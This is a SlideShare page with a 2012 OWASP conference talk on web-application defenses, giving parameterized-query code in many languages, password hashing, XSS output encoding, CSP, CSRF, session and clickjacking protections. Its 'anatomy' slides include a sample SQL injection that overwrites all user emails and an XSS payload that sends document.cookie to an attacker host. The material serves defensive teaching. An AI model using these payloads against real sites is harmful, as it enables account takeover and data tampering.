DefCamp, profile picture
Uploaded byDefCamp
PPT, PDF2,183 views

Top Ten Web Defenses - DefCamp 2012

The document discusses defenses against SQL injection and cross-site scripting (XSS) attacks. It provides examples of query parameterization in different programming languages to prevent SQL injection and discusses contextual output encoding to prevent XSS attacks. It explains how to securely store passwords by using techniques like salting, hashing, and multiple iterations to make password cracking more difficult.

Embed presentation

Downloaded 37 times
Top Ten Defenses It’s ok to cheat OWASP Cheatsheet Series https://www.owasp.org/index.php/Cheat_Sheets 1
HACKED © 2012 WhiteHat Security, Inc. 2
';
Anatomy of a SQL Injection Attack $NEW_EMAIL = Request[‘new_email’]; $USER_ID = Request[‘user_id’]; update users set email=‘$NEW_EMAIL’ where id=$USER_ID;
Anatomy of a SQL Injection Attack $NEW_EMAIL = Request['new_email']; $USER_ID = Request['user_id']; update users set email='$NEW_EMAIL' where id=$USER_ID; SUPER AWESOME HACK: $NEW_EMAIL = '; update users set email='';
[1] Query Parameterization (PHP) $stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); $stmt->bindParam(':new_email', $email); $stmt->bindParam(':user_id', $id);
Query Parameterization (.NET) SqlConnection objConnection = new SqlConnection(_ConnectionString); objConnection.Open(); SqlCommand objCommand = new SqlCommand( "SELECT * FROM User WHERE Name = @Name AND Password = @Password", objConnection); objCommand.Parameters.Add("@Name", NameTextBox.Text); objCommand.Parameters.Add("@Password", PassTextBox.Text); SqlDataReader objReader = objCommand.ExecuteReader();
Query Parameterization (Java) String newName = request.getParameter("newName") ; String id = request.getParameter("id"); //SQL PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); pstmt.setString(1, newName); pstmt.setString(2, id); //HQL Query safeHQLQuery = session.createQuery("from Employees where id=:empId"); safeHQLQuery.setParameter("empId", id);
Query Parameterization (Ruby) # Create Project.create!(:name => 'owasp') # Read Project.all(:conditions => "name = ?", name) Project.all(:conditions => { :name => name }) Project.where("name = :name", :name => name) Project.where(:id=> params[:id]).all # Update project.update_attributes(:name => 'owasp')
Query Parameterization (Cold Fusion) <cfquery name="getFirst" dataSource="cfsnippets"> SELECT * FROM #strDatabasePrefix#_courses WHERE intCourseID = <cfqueryparam value=#intCourseID# CFSQLType="CF_SQL_INTEGER"> </cfquery>
Query Parameterization (PERL) my $sql = "INSERT INTO foo (bar, baz) VALUES ( ?, ? )"; my $sth = $dbh->prepare( $sql ); $sth->execute( $bar, $baz );
Query Parameterization (.NET LINQ) public bool login(string loginId, string shrPass) { DataClassesDataContext db = new DataClassesDataContext(); var validUsers = from user in db.USER_PROFILE where user.LOGIN_ID == loginId && user.PASSWORDH == shrPass select user; if (validUsers.Count() > 0) return true; return false; };
[2] Secure Password Storage public String hash(String password, String userSalt, int iterations) throws EncryptionException { byte[] bytes = null; try { MessageDigest digest = MessageDigest.getInstance(hashAlgorithm); digest.reset(); digest.update(ESAPI.securityConfiguration().getMasterSalt()); digest.update(userSalt.getBytes(encoding)); digest.update(password.getBytes(encoding)); // rehash a number of times to help strengthen weak passwords bytes = digest.digest(); for (int i = 0; i < iterations; i++) { digest.reset(); bytes = digest.digest(bytes); } String encoded = ESAPI.encoder().encodeForBase64(bytes,false); return encoded; } catch (Exception ex) { throw new EncryptionException("Internal error", "Error"); }}
Secure Password Storage public String hash(String password, String userSalt, int iterations) throws EncryptionException { byte[] bytes = null; try { MessageDigest digest = MessageDigest.getInstance(hashAlgorithm); digest.reset(); digest.update(ESAPI.securityConfiguration().getMasterSalt()); digest.update(userSalt.getBytes(encoding)); digest.update(password.getBytes(encoding)); // rehash a number of times to help strengthen weak passwords bytes = digest.digest(); for (int i = 0; i < iterations; i++) { digest.reset(); bytes = digest.digest(bytes); } String encoded = ESAPI.encoder().encodeForBase64(bytes,false); return encoded; } catch (Exception ex) { throw new EncryptionException("Internal error", "Error"); }}
Secure Password Storage public String hash(String password, String userSalt, int iterations) throws EncryptionException { byte[] bytes = null; try { MessageDigest digest = MessageDigest.getInstance(hashAlgorithm); digest.reset(); digest.update(ESAPI.securityConfiguration().getMasterSalt()); digest.update(userSalt.getBytes(encoding)); digest.update(password.getBytes(encoding)); // rehash a number of times to help strengthen weak passwords bytes = digest.digest(); for (int i = 0; i < iterations; i++) { digest.reset(); bytes = digest.digest(salts + bytes + hash(i)); } String encoded = ESAPI.encoder().encodeForBase64(bytes,false); return encoded; } catch (Exception ex) { throw new EncryptionException("Internal error", "Error"); }}
Secure Password Storage • BCRYPT - Really slow on purpose - Blowfish derived - Suppose you are supporting millions on concurrent logins… - Takes about 10 concurrent runs of BCRYPT to pin a high performance laptop CPU • PBKDF2 - Takes up a lot of memory - Suppose you are supporting millions on concurrent logins…
Anatomy of a XSS Attack <script>window.location=‘http://evi leviljim.com/unc/data=‘ + document.cookie;</script> <script>document.body.innerHTML=‘<b link>CYBER IS COOL</blink>’;</script>
[3] Contextual Output Encoding (XSS Defense) – Session Hijacking – Site Defacement – Network Scanning – Undermining CSRF Defenses – Site Redirection/Phishing – Load of Remotely Hosted Scripts – Data Theft – Keystroke Logging – Attackers using XSS more frequently
XSS Defense by Data Type and Context Data Type Context Defense String HTML Body HTML Entity Encode String HTML Attribute Minimal Attribute Encoding String GET Parameter URL Encoding String Untrusted URL URL Validation, avoid javascript: URLs, Attribute encoding, safe URL verification String CSS Strict structural validation, CSS Hex encoding, good design HTML HTML Body HTML Validation (JSoup, AntiSamy, HTML Sanitizer) Any DOM DOM XSS Cheat Sheet Untrusted JavaScript Any Sandboxing JSON Client Parse Time JSON.parse() or json2.js Safe HTML Attributes include: align, alink, alt, bgcolor, border, cellpadding, cellspacing, class, color, cols, colspan, coords, dir, face, height, hspace, ismap, lang, marginheight, marginwidth, multiple, nohref, noresize, noshade, nowrap, ref, rel, rev, rows, rowspan, scrolling, shape, span, summary, tabindex, title, usemap, valign, value, vlink, vspace, width
HTML Body Context <span>UNTRUSTED DATA</span>
HTML Attribute Context <input type="text" name="fname" value="UNTRUSTED DATA"> attack: "><script>/* bad stuff */</script>
HTTP GET Parameter Context <a href="/site/search?value=UNTRUSTED DATA">clickme</a>
URL Context <a href="UNTRUSTED URL">clickme</a> <iframe src="UNTRUSTED URL" /> attack: javascript:eval(/* BAD STUFF */)
CSS Value Context <div style="width: UNTRUSTED DATA;">Selection</div> attack: expression(/* BAD STUFF */)
JavaScript Variable Context <script>var currentValue='UNTRUSTED DATA';</script> <script>someFunction('UNTRUSTED DATA');</script> attack: ');/* BAD STUFF */
JSON Parsing Context JSON.parse(UNTRUSTED JSON DATA)
 SAFE use of JQuery  $(‘#element’).text(UNTRUSTED DATA); UNSAFE use of JQuery   $(‘#element’).html(UNTRUSTED DATA);
Dangerous jQuery 1.7.2 Data Types CSS Some Attribute Settings HTML URL (Potential Redirect) jQuery methods that directly update DOM or can execute JavaScript $() or jQuery() .attr() .add() .css() .after() .html() .animate() .insertAfter() .append() .insertBefore() .appendTo() Note: .text() updates DOM, but is safe. jQuery methods that accept URLs to potentially unsafe content jQuery.ajax() jQuery.post() jQuery.get() load() jQuery.getScript() 28
JQuery Encoding with JQencoder  Contextual encoding is a crucial technique needed to stop all types of XSS  jqencoder is a jQuery plugin that allows developers to do contextual encoding in JavaScript to stop DOM- based XSS  http://plugins.jquery.com/plugin-tags/security  $('#element').encode('html', cdata);
Best Practice: DOM-Based XSS Defense • Untrusted data should only be treated as displayable text • JavaScript encode and delimit untrusted data as quoted strings • Use document.createElement("…"), element.setAttribute("…","value"), element.appendChild(…), etc. to build dynamic interfaces (safe attributes only) • Avoid use of HTML rendering methods • Make sure that any untrusted data passed to eval() methods is delimited with string delimiters and enclosed within a closure such as eval(someFunction(‘UNTRUSTED DATA’));
[4] Content Security Policy • Anti-XSS W3C standard • CSP 1.1 Draft 19 published August 2012 - https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp- specification.dev.html • Must move all inline script and style into external scripts • Add the X-Content-Security-Policy response header to instruct the browser that CSP is in use - Firefox/IE10PR: X-Content-Security-Policy - Chrome Experimental: X-WebKit-CSP - Content-Security-Policy-Report-Only • Define a policy for the site regarding loading of content
CSP By Example 1 Source: http://people.mozilla.com/~bsterne/content-security- policy/details.html Site allows images from anywhere, plugin content from a list of trusted media providers, and scripts only from its server: X-Content-Security-Policy: allow 'self'; img-src *; object-src media1.com media2.com; script-src scripts.example.com
CSP By Example 2 Source: http://www.html5rocks.com/en/tutorials/security/content- security-policy/ Site that loads resources from a content delivery network and does not need framed content or any plugins X-Content-Security-Policy: default-src https://cdn.example.net; frame-src 'none'; object-src 'none'
[5] Cross-Site Request Forgery Tokens and Re-authentication – Cryptographic Tokens • Primary and most powerful defense. Randomness is your friend – Require users to re-authenticate • Amazon.com does this *really* well – Double-cookie submit defense • Decent defense, but not based on randomness; based on SOP
[6] Multi Factor Authentication – Passwords as a single AuthN factor are DEAD! – Mobile devices are quickly becoming the “what you have” factor – SMS and native apps for MFA are not perfect but heavily reduce risk vs. passwords only – Password strength and password policy can be MUCH WEAKER in the face of MFA – If you are protecting your magic user and fireball wand with MFA (Blizzard.net) you may also wish to consider protecting your multi-billion dollar enterprise with MFA
[7] Forgot Password Secure Design – Require identity and security questions • Last name, account number, email, DOB • Enforce lockout policy • Ask one or more good security questions – http://www.goodsecurityquestions.com/ – Send the user a randomly generated token via out-of-band method • email, SMS or token – Verify code in same Web session • Enforce lockout policy – Change password • Enforce password policy
[8] Session Defenses – Ensure secure session IDs • 20+ bytes, cryptographically random • Stored in HTTP Cookies • Cookies: Secure, HTTP Only, limited path • No Wildcard Domains – Generate new session ID at login time • To avoid session fixation – Session Timeout • Idle Timeout • Absolute Timeout • Logout Functionality
Anatomy of a Clickjacking Attack
[9] X-Frame-Options // to prevent all framing of this content response.addHeader( "X-FRAME-OPTIONS", "DENY" ); // to allow framing of this content only by this site response.addHeader( "X-FRAME-OPTIONS", "SAMEORIGIN" ); // to allow framing from a specific domain response.addHeader( "X-FRAME-OPTIONS", "ALLOW-FROM X" );
Legacy Browser Clickjacking Defense <style id="antiCJ">body{display:none !important;}</style> <script type="text/javascript"> if (self === top) { var antiClickjack = document.getElementByID("antiCJ"); antiClickjack.parentNode.removeChild(antiClickjack) } else { top.location = self.location; } </script>
[10] Encryption in Transit (HTTPS/TLS) – Authentication credentials and session identifiers must be encrypted in transit via HTTPS/SSL • Starting when the login form is rendered • Until logout is complete • CSP and HSTS can help here – https://www.ssllabs.com free online assessment of public-facing server HTTPS configuration – https://www.owasp.org/index.php/Transport_Layer_Protecti on_Cheat_Sheet for HTTPS best practices
and love the WAF
[11] Virtual Patching “A security policy enforcement layer which prevents the exploitation of a known vulnerability”
Virtual Patching Rationale for Usage – No Source Code Access – No Access to Developers – High Cost/Time to Fix Benefit – Reduce Time-to-Fix – Reduce Attack Surface
Strategic Remediation • Ownership is Builders • Focus on web application root causes of vulnerabilities and creation of controls in code • Ideas during design and initial coding phase of SDLC • This takes serious time, expertise and planning
Tactical Remediation • Ownership is Defenders • Focus on web applications that are already in production and exposed to attacks • Examples include using a Web Application Firewall (WAF) such as ModSecurity • Aim to minimize the Time-to-Fix exposures
OWASP ModSecurity Core Rule Set (CRS) http://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project
jim@owasp.org

More Related Content

PDF
Tame Accidental Complexity with Ruby and MongoMapper
byGiordano Scalzo
 
PDF
Security and performance designs for client-server communications
byWO Community
 
PDF
Node.js in action
bySimon Su
 
PPTX
Cargo Cult Security UJUG Sep2015
byDerrick Isaacson
 
PPTX
Final microsoft cloud summit - windows azure building block services
bystratospheres
 
PPTX
I Left My JWT in San JOSE
byBrian Campbell
 
ODP
Modularized Persistence - B Zsoldos
bymfrancis
 
PDF
Security in Node.JS and Express:
byPetros Demetrakopoulos
 
Tame Accidental Complexity with Ruby and MongoMapper
byGiordano Scalzo
 
Security and performance designs for client-server communications
byWO Community
 
Node.js in action
bySimon Su
 
Cargo Cult Security UJUG Sep2015
byDerrick Isaacson
 
Final microsoft cloud summit - windows azure building block services
bystratospheres
 
I Left My JWT in San JOSE
byBrian Campbell
 
Modularized Persistence - B Zsoldos
bymfrancis
 
Security in Node.JS and Express:
byPetros Demetrakopoulos
 

What's hot

PPTX
Getting started with Elasticsearch and .NET
byTomas Jansson
 
PPTX
Building Secure User Interfaces With JWTs (JSON Web Tokens)
byStormpath
 
KEY
CouchDB on Android
bySven Haiges
 
PPTX
Web security
bydavidahaskins
 
PPTX
Mongo db mug_2012-02-07
byWill Button
 
PDF
Javascript Object Signing & Encryption
byAaron Zauner
 
PDF
Application Security around OWASP Top 10
bySastry Tumuluri
 
KEY
Google
bysoon
 
KEY
Authentication
bysoon
 
PDF
Cache is King: Get the Most Bang for Your Buck From Ruby
byMolly Struve
 
PPTX
JOSE Can You See...
byBrian Campbell
 
PDF
Perl object ?
byℕicolas ℝ.
 
PPTX
Web application Security
byLee C
 
ODP
High Performance XQuery Processing in PHP with Zorba by Vikram Vaswani
byvvaswani
 
PDF
DEF CON 23 - amit ashbel and maty siman - game of hacks
byFelipe Prado
 
PPTX
ONE MORE TIME ABOUT CODE STANDARDS AND BEST PRACTICES
byDrupalCamp Kyiv
 
PDF
Nko workshop - node js crud & deploy
bySimon Su
 
PDF
ドキュメントデータベースとして MySQLを使う!? ~MySQL JSON UDF~
byyoyamasaki
 
PPTX
An Introduction to the Emerging JSON-Based Identity and Security Protocols (O...
byBrian Campbell
 
Getting started with Elasticsearch and .NET
byTomas Jansson
 
Building Secure User Interfaces With JWTs (JSON Web Tokens)
byStormpath
 
CouchDB on Android
bySven Haiges
 
Web security
bydavidahaskins
 
Mongo db mug_2012-02-07
byWill Button
 
Javascript Object Signing & Encryption
byAaron Zauner
 
Application Security around OWASP Top 10
bySastry Tumuluri
 
Google
bysoon
 
Authentication
bysoon
 
Cache is King: Get the Most Bang for Your Buck From Ruby
byMolly Struve
 
JOSE Can You See...
byBrian Campbell
 
Perl object ?
byℕicolas ℝ.
 
Web application Security
byLee C
 
High Performance XQuery Processing in PHP with Zorba by Vikram Vaswani
byvvaswani
 
DEF CON 23 - amit ashbel and maty siman - game of hacks
byFelipe Prado
 
ONE MORE TIME ABOUT CODE STANDARDS AND BEST PRACTICES
byDrupalCamp Kyiv
 
Nko workshop - node js crud & deploy
bySimon Su
 
ドキュメントデータベースとして MySQLを使う!? ~MySQL JSON UDF~
byyoyamasaki
 
An Introduction to the Emerging JSON-Based Identity and Security Protocols (O...
byBrian Campbell
 

Similar to Top Ten Web Defenses - DefCamp 2012

PPTX
Top Ten Java Defense for Web Applications v2
byJim Manico
 
PPTX
04. xss and encoding
byEoin Keary
 
PPT
Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...
byXlator
 
PPT
XSS Primer - Noob to Pro in 1 hour
bysnoopythesecuritydog
 
PPT
Top Ten Web Application Defenses v12
byJim Manico
 
PDF
The Future of Web Attacks - CONFidence 2010
byMario Heiderich
 
PPTX
Open source security
bylrigknat
 
PDF
Security Vulnerabilities: How to Defend Against Them
byMartin Vigo
 
PDF
Ultimate xss
byARahim Özel
 
ODP
XSS
byHrishikesh Mishra
 
PPTX
Hackers versus Developers and Secure Web Programming
byAkash Mahajan
 
PDF
Evolution Of Web Security
byChris Shiflett
 
PDF
Rich Web App Security - Keeping your application safe
byJeremiah Grossman
 
PPTX
Web application security for java (XSS,Session Fixation)
byRitesh Raushan
 
PDF
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
byGiorgiRcheulishvili
 
PDF
Web Security Threats and Solutions
byIvo Andreev
 
PPTX
Devouring Security Insufficient data validation risks Cross Site Scripting
bygmaran23
 
PPT
Intro to Web Application Security
byRob Ragan
 
PPTX
Security Code Review 101
byPaul Ionescu
 
DOCX
logout.php Session Data after Logout Username Email . $_.docx
bysmile790243
 
Top Ten Java Defense for Web Applications v2
byJim Manico
 
04. xss and encoding
byEoin Keary
 
Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...
byXlator
 
XSS Primer - Noob to Pro in 1 hour
bysnoopythesecuritydog
 
Top Ten Web Application Defenses v12
byJim Manico
 
The Future of Web Attacks - CONFidence 2010
byMario Heiderich
 
Open source security
bylrigknat
 
Security Vulnerabilities: How to Defend Against Them
byMartin Vigo
 
Ultimate xss
byARahim Özel
 
XSS
byHrishikesh Mishra
 
Hackers versus Developers and Secure Web Programming
byAkash Mahajan
 
Evolution Of Web Security
byChris Shiflett
 
Rich Web App Security - Keeping your application safe
byJeremiah Grossman
 
Web application security for java (XSS,Session Fixation)
byRitesh Raushan
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
byGiorgiRcheulishvili
 
Web Security Threats and Solutions
byIvo Andreev
 
Devouring Security Insufficient data validation risks Cross Site Scripting
bygmaran23
 
Intro to Web Application Security
byRob Ragan
 
Security Code Review 101
byPaul Ionescu
 
logout.php Session Data after Logout Username Email . $_.docx
bysmile790243
 

More from DefCamp

PDF
Remote Yacht Hacking
byDefCamp
 
PDF
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
byDefCamp
 
PPTX
The Charter of Trust
byDefCamp
 
PPTX
Internet Balkanization: Why Are We Raising Borders Online?
byDefCamp
 
PPTX
Bridging the gap between CyberSecurity R&D and UX
byDefCamp
 
PPTX
Secure and privacy-preserving data transmission and processing using homomorp...
byDefCamp
 
PPTX
Drupalgeddon 2 – Yet Another Weapon for the Attacker
byDefCamp
 
PPTX
Economical Denial of Sustainability in the Cloud (EDOS)
byDefCamp
 
PPTX
Trust, but verify – Bypassing MFA
byDefCamp
 
PPTX
Threat Hunting: From Platitudes to Practical Application
byDefCamp
 
PPTX
Building application security with 0 money down
byDefCamp
 
PPTX
Implementation of information security techniques on modern android based Kio...
byDefCamp
 
PPTX
Lattice based Merkle for post-quantum epoch
byDefCamp
 
PPTX
The challenge of building a secure and safe digital environment in healthcare
byDefCamp
 
PPTX
Timing attacks against web applications: Are they still practical?
byDefCamp
 
PPTX
Tor .onions: The Good, The Rotten and The Misconfigured
byDefCamp
 
PPTX
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
byDefCamp
 
PPTX
We will charge you. How to [b]reach vendor’s network using EV charging station.
byDefCamp
 
PPTX
Connect & Inspire Cyber Security
byDefCamp
 
PPTX
The lions and the watering hole
byDefCamp
 
Remote Yacht Hacking
byDefCamp
 
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
byDefCamp
 
The Charter of Trust
byDefCamp
 
Internet Balkanization: Why Are We Raising Borders Online?
byDefCamp
 
Bridging the gap between CyberSecurity R&D and UX
byDefCamp
 
Secure and privacy-preserving data transmission and processing using homomorp...
byDefCamp
 
Drupalgeddon 2 – Yet Another Weapon for the Attacker
byDefCamp
 
Economical Denial of Sustainability in the Cloud (EDOS)
byDefCamp
 
Trust, but verify – Bypassing MFA
byDefCamp
 
Threat Hunting: From Platitudes to Practical Application
byDefCamp
 
Building application security with 0 money down
byDefCamp
 
Implementation of information security techniques on modern android based Kio...
byDefCamp
 
Lattice based Merkle for post-quantum epoch
byDefCamp
 
The challenge of building a secure and safe digital environment in healthcare
byDefCamp
 
Timing attacks against web applications: Are they still practical?
byDefCamp
 
Tor .onions: The Good, The Rotten and The Misconfigured
byDefCamp
 
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
byDefCamp
 
We will charge you. How to [b]reach vendor’s network using EV charging station.
byDefCamp
 
Connect & Inspire Cyber Security
byDefCamp
 
The lions and the watering hole
byDefCamp
 

Top Ten Web Defenses - DefCamp 2012

  • 1.
    Top Ten Defenses It’s ok to cheat OWASP Cheatsheet Series https://www.owasp.org/index.php/Cheat_Sheets 1
  • 2.
    HACKED © 2012 WhiteHat Security, Inc. 2
  • 3.
  • 4.
    Anatomy of aSQL Injection Attack $NEW_EMAIL = Request[‘new_email’]; $USER_ID = Request[‘user_id’]; update users set email=‘$NEW_EMAIL’ where id=$USER_ID;
  • 5.
    Anatomy of aSQL Injection Attack $NEW_EMAIL = Request['new_email']; $USER_ID = Request['user_id']; update users set email='$NEW_EMAIL' where id=$USER_ID; SUPER AWESOME HACK: $NEW_EMAIL = '; update users set email='';
  • 6.
    [1] Query Parameterization (PHP) $stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); $stmt->bindParam(':new_email', $email); $stmt->bindParam(':user_id', $id);
  • 7.
    Query Parameterization (.NET) SqlConnectionobjConnection = new SqlConnection(_ConnectionString); objConnection.Open(); SqlCommand objCommand = new SqlCommand( "SELECT * FROM User WHERE Name = @Name AND Password = @Password", objConnection); objCommand.Parameters.Add("@Name", NameTextBox.Text); objCommand.Parameters.Add("@Password", PassTextBox.Text); SqlDataReader objReader = objCommand.ExecuteReader();
  • 8.
    Query Parameterization (Java) StringnewName = request.getParameter("newName") ; String id = request.getParameter("id"); //SQL PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); pstmt.setString(1, newName); pstmt.setString(2, id); //HQL Query safeHQLQuery = session.createQuery("from Employees where id=:empId"); safeHQLQuery.setParameter("empId", id);
  • 9.
    Query Parameterization (Ruby) #Create Project.create!(:name => 'owasp') # Read Project.all(:conditions => "name = ?", name) Project.all(:conditions => { :name => name }) Project.where("name = :name", :name => name) Project.where(:id=> params[:id]).all # Update project.update_attributes(:name => 'owasp')
  • 10.
    Query Parameterization (ColdFusion) <cfquery name="getFirst" dataSource="cfsnippets"> SELECT * FROM #strDatabasePrefix#_courses WHERE intCourseID = <cfqueryparam value=#intCourseID# CFSQLType="CF_SQL_INTEGER"> </cfquery>
  • 11.
    Query Parameterization (PERL) my$sql = "INSERT INTO foo (bar, baz) VALUES ( ?, ? )"; my $sth = $dbh->prepare( $sql ); $sth->execute( $bar, $baz );
  • 12.
    Query Parameterization (.NETLINQ) public bool login(string loginId, string shrPass) { DataClassesDataContext db = new DataClassesDataContext(); var validUsers = from user in db.USER_PROFILE where user.LOGIN_ID == loginId && user.PASSWORDH == shrPass select user; if (validUsers.Count() > 0) return true; return false; };
  • 13.
    [2] Secure Password Storage public String hash(String password, String userSalt, int iterations) throws EncryptionException { byte[] bytes = null; try { MessageDigest digest = MessageDigest.getInstance(hashAlgorithm); digest.reset(); digest.update(ESAPI.securityConfiguration().getMasterSalt()); digest.update(userSalt.getBytes(encoding)); digest.update(password.getBytes(encoding)); // rehash a number of times to help strengthen weak passwords bytes = digest.digest(); for (int i = 0; i < iterations; i++) { digest.reset(); bytes = digest.digest(bytes); } String encoded = ESAPI.encoder().encodeForBase64(bytes,false); return encoded; } catch (Exception ex) { throw new EncryptionException("Internal error", "Error"); }}
  • 14.
    Secure Password Storage publicString hash(String password, String userSalt, int iterations) throws EncryptionException { byte[] bytes = null; try { MessageDigest digest = MessageDigest.getInstance(hashAlgorithm); digest.reset(); digest.update(ESAPI.securityConfiguration().getMasterSalt()); digest.update(userSalt.getBytes(encoding)); digest.update(password.getBytes(encoding)); // rehash a number of times to help strengthen weak passwords bytes = digest.digest(); for (int i = 0; i < iterations; i++) { digest.reset(); bytes = digest.digest(bytes); } String encoded = ESAPI.encoder().encodeForBase64(bytes,false); return encoded; } catch (Exception ex) { throw new EncryptionException("Internal error", "Error"); }}
  • 15.
    Secure Password Storage publicString hash(String password, String userSalt, int iterations) throws EncryptionException { byte[] bytes = null; try { MessageDigest digest = MessageDigest.getInstance(hashAlgorithm); digest.reset(); digest.update(ESAPI.securityConfiguration().getMasterSalt()); digest.update(userSalt.getBytes(encoding)); digest.update(password.getBytes(encoding)); // rehash a number of times to help strengthen weak passwords bytes = digest.digest(); for (int i = 0; i < iterations; i++) { digest.reset(); bytes = digest.digest(salts + bytes + hash(i)); } String encoded = ESAPI.encoder().encodeForBase64(bytes,false); return encoded; } catch (Exception ex) { throw new EncryptionException("Internal error", "Error"); }}
  • 16.
    Secure Password Storage •BCRYPT - Really slow on purpose - Blowfish derived - Suppose you are supporting millions on concurrent logins… - Takes about 10 concurrent runs of BCRYPT to pin a high performance laptop CPU • PBKDF2 - Takes up a lot of memory - Suppose you are supporting millions on concurrent logins…
  • 17.
    Anatomy of aXSS Attack <script>window.location=‘http://evi leviljim.com/unc/data=‘ + document.cookie;</script> <script>document.body.innerHTML=‘<b link>CYBER IS COOL</blink>’;</script>
  • 18.
    [3] Contextual Output Encoding (XSS Defense) – Session Hijacking – Site Defacement – Network Scanning – Undermining CSRF Defenses – Site Redirection/Phishing – Load of Remotely Hosted Scripts – Data Theft – Keystroke Logging – Attackers using XSS more frequently
  • 19.
    XSS Defense byData Type and Context Data Type Context Defense String HTML Body HTML Entity Encode String HTML Attribute Minimal Attribute Encoding String GET Parameter URL Encoding String Untrusted URL URL Validation, avoid javascript: URLs, Attribute encoding, safe URL verification String CSS Strict structural validation, CSS Hex encoding, good design HTML HTML Body HTML Validation (JSoup, AntiSamy, HTML Sanitizer) Any DOM DOM XSS Cheat Sheet Untrusted JavaScript Any Sandboxing JSON Client Parse Time JSON.parse() or json2.js Safe HTML Attributes include: align, alink, alt, bgcolor, border, cellpadding, cellspacing, class, color, cols, colspan, coords, dir, face, height, hspace, ismap, lang, marginheight, marginwidth, multiple, nohref, noresize, noshade, nowrap, ref, rel, rev, rows, rowspan, scrolling, shape, span, summary, tabindex, title, usemap, valign, value, vlink, vspace, width
  • 20.
  • 21.
    HTML Attribute Context <input type="text" name="fname" value="UNTRUSTED DATA"> attack: "><script>/* bad stuff */</script>
  • 22.
    HTTP GET ParameterContext <a href="/site/search?value=UNTRUSTED DATA">clickme</a>
  • 23.
    URL Context <a href="UNTRUSTED URL">clickme</a> <iframe src="UNTRUSTED URL" /> attack: javascript:eval(/* BAD STUFF */)
  • 24.
    CSS Value Context <div style="width: UNTRUSTED DATA;">Selection</div> attack: expression(/* BAD STUFF */)
  • 25.
    JavaScript Variable Context <script>varcurrentValue='UNTRUSTED DATA';</script> <script>someFunction('UNTRUSTED DATA');</script> attack: ');/* BAD STUFF */
  • 26.
  • 27.
    SAFE use of JQuery  $(‘#element’).text(UNTRUSTED DATA); UNSAFE use of JQuery   $(‘#element’).html(UNTRUSTED DATA);
  • 28.
    Dangerous jQuery 1.7.2Data Types CSS Some Attribute Settings HTML URL (Potential Redirect) jQuery methods that directly update DOM or can execute JavaScript $() or jQuery() .attr() .add() .css() .after() .html() .animate() .insertAfter() .append() .insertBefore() .appendTo() Note: .text() updates DOM, but is safe. jQuery methods that accept URLs to potentially unsafe content jQuery.ajax() jQuery.post() jQuery.get() load() jQuery.getScript() 28
  • 29.
    JQuery Encoding withJQencoder  Contextual encoding is a crucial technique needed to stop all types of XSS  jqencoder is a jQuery plugin that allows developers to do contextual encoding in JavaScript to stop DOM- based XSS  http://plugins.jquery.com/plugin-tags/security  $('#element').encode('html', cdata);
  • 30.
    Best Practice: DOM-BasedXSS Defense • Untrusted data should only be treated as displayable text • JavaScript encode and delimit untrusted data as quoted strings • Use document.createElement("…"), element.setAttribute("…","value"), element.appendChild(…), etc. to build dynamic interfaces (safe attributes only) • Avoid use of HTML rendering methods • Make sure that any untrusted data passed to eval() methods is delimited with string delimiters and enclosed within a closure such as eval(someFunction(‘UNTRUSTED DATA’));
  • 31.
    [4] Content Security Policy • Anti-XSS W3C standard • CSP 1.1 Draft 19 published August 2012 - https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp- specification.dev.html • Must move all inline script and style into external scripts • Add the X-Content-Security-Policy response header to instruct the browser that CSP is in use - Firefox/IE10PR: X-Content-Security-Policy - Chrome Experimental: X-WebKit-CSP - Content-Security-Policy-Report-Only • Define a policy for the site regarding loading of content
  • 32.
    CSP By Example1 Source: http://people.mozilla.com/~bsterne/content-security- policy/details.html Site allows images from anywhere, plugin content from a list of trusted media providers, and scripts only from its server: X-Content-Security-Policy: allow 'self'; img-src *; object-src media1.com media2.com; script-src scripts.example.com
  • 33.
    CSP By Example2 Source: http://www.html5rocks.com/en/tutorials/security/content- security-policy/ Site that loads resources from a content delivery network and does not need framed content or any plugins X-Content-Security-Policy: default-src https://cdn.example.net; frame-src 'none'; object-src 'none'
  • 34.
    [5] Cross-Site Request Forgery Tokens and Re-authentication – Cryptographic Tokens • Primary and most powerful defense. Randomness is your friend – Require users to re-authenticate • Amazon.com does this *really* well – Double-cookie submit defense • Decent defense, but not based on randomness; based on SOP
  • 35.
    [6] Multi Factor Authentication – Passwords as a single AuthN factor are DEAD! – Mobile devices are quickly becoming the “what you have” factor – SMS and native apps for MFA are not perfect but heavily reduce risk vs. passwords only – Password strength and password policy can be MUCH WEAKER in the face of MFA – If you are protecting your magic user and fireball wand with MFA (Blizzard.net) you may also wish to consider protecting your multi-billion dollar enterprise with MFA
  • 36.
    [7] Forgot Password Secure Design – Require identity and security questions • Last name, account number, email, DOB • Enforce lockout policy • Ask one or more good security questions – http://www.goodsecurityquestions.com/ – Send the user a randomly generated token via out-of-band method • email, SMS or token – Verify code in same Web session • Enforce lockout policy – Change password • Enforce password policy
  • 37.
